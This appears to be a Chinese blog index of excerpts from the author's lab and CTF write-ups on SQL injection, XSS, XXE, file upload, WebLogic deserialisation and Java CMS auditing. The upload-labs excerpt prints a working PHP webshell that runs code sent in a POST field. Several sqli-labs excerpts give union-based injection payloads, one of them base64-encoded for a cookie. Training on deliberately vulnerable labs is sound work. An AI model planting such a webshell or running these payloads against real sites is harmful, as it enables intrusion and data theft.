靶机训练
文章平均质量分 94
吧唧的通关流程一览
Alexz__
我不假思索地上路,因为出发的感觉太好了。世界突然充满了可能性。
展开
-
从OFCMS出发,浅析JavaWeb项目技术结构及其功能
ofcms简介,技术选型介绍 Tomcat运行原理浅析 Maven功能浅析 ofcms项目结构分析壹 ofcms简介ofcms是一款基于java开发的内容管理系统,也就是我们俗称的建站系统,国内建站系统大多由php开发而来,java开发的少之又少本打算基于ofcms入手,开始java代码审计的学习流程,后发现自身知识盲区实在太多,于是便开始从底层一步步的开始学习ofcms建于Tomcat 8.5+之上,使用Maven内容管理模块,数据库使用MySQL 5.7+,其项目结构大致如...原创 2021-04-29 22:38:37 · 1731 阅读 · 2 评论 -
对于昨夜梦里对某外网电商平台web渗透测试总结体会
1,信息收集2,漏洞探测3,漏洞利用渗透测试漏洞挖掘,本质上就是一个不断失败的循环,尝试 -> 失败 -> 继续尝试->继续失败 -> ....只有习惯了失败,不再抗拒失败,从容的接受失败,平静的进行下一次尝试,才是成为一个合格的渗透测试工程师的关键因素。下面所叙述的一切都是我的潜意识臆想,都是不存在的事情壹 信息收集...原创 2020-04-04 20:12:02 · 987 阅读 · 4 评论 -
xml标记语言与json语言简介和XXE漏洞利用浅析
1,xml标记语言2,json数据格式语言3,xml与json异同分析4,XXE漏洞简介以及三种外部实体注入声明5,基于xxe-lab靶机环境的xxe漏洞复现壹 xml标记语言简介XML(Extensible Markup Language)扩展标记语言 ,是一种常用的标记语言,用于标记电子文件使其具有结构性,可以用来标记数据、定义数据类型,是一种允许用户对...原创 2020-03-29 23:50:58 · 573 阅读 · 0 评论 -
基于vulhub平台的JAVAEE中间件weblogic漏洞CVE17-10271复现及修复建议
1,漏洞介绍2,反弹shell利用执行壹 漏洞介绍CVE17-10271漏洞全程是Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞weblogic是WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发...原创 2020-03-21 16:10:25 · 528 阅读 · 0 评论 -
xss-labs 11-18通关攻略
http://alexzspace.cn/?p=144原创 2020-03-17 20:11:07 · 883 阅读 · 0 评论 -
xss-labs 1-10 通关攻略
http://alexzspace.cn/?p=80原创 2020-03-17 20:10:32 · 1432 阅读 · 0 评论 -
sqli-labs-master前三十一到四十关过关总结
第三十一关:换了个闭合第三十二关:数据库连接的致命性错误,导致二层ubuntu服务器mysql无法连接遂跳过第三十三关:这一关开始就可以回到我们的phpstudy了,不再需要jspstudy和ubuntu虚拟机的辅助发现我们的单引号前面被加了一个斜杠 \观察源码,发现此内容...原创 2020-02-13 18:51:22 · 915 阅读 · 0 评论 -
sqli-labs-master前二十一到三十关过关总结
第二十一关:通过抓包分析这里的cookie:被base64加码算法加密了,懒得找闭合了直接看源码:通过源码构造闭合,在某在线网站进行base64加密:JykgdW5pb24gc2VsZWN0IDEsMiwzICM=直接爆出来显示位') union select 1,group_concat(schema_name),3 from ...原创 2020-02-13 00:11:29 · 1319 阅读 · 0 评论 -
sqli-labs-master前十一到二十关过关总结
第十一关这里首先要明确一个概念:GET和POST的数据交流方式GET是从服务器上获取数据,POST是向服务器传送数据。从第十一关开始就是POST方式交互数据,也就是向服务器传送数据表现了向网站服务器发送的请求包中所包含的数据,网站服务器会从请求包中提取额相应必要的数据和服务器数据库比对,从而生成返回包即我们在浏览器上所能见到的web网页信息先分析源代码:这里...原创 2020-02-11 23:15:00 · 1460 阅读 · 2 评论 -
sqli-labs-master前十关过关总结
登入Windows命令行MySQL,方便查验注入命令第一关:在$_GET id处注入源码如下只需构造闭合即可爆出数据单引号’报错查列数:知道为3列之后使用sql联合查询语句:union这里需要注意,使用联合查询爆出数据库名称的时候前面id值需要放空:因为网页上能显示的只有第一行的内容所以前面id值需要放空为“null”查看...原创 2020-02-04 16:58:05 · 1282 阅读 · 0 评论 -
upload-labs-master靶机闯关总结
此靶机上传的都是此一句马文件<?php class test {function assert(){$f = __FUNCTION__ ;@$f($_POST['shell']);}}$t = new test();$t->assert(); ?>部分少有的曲线(救国)木马会在相应的pass里面贴出来<?php 直奔主题 ?>p...原创 2019-10-14 00:35:50 · 2275 阅读 · 0 评论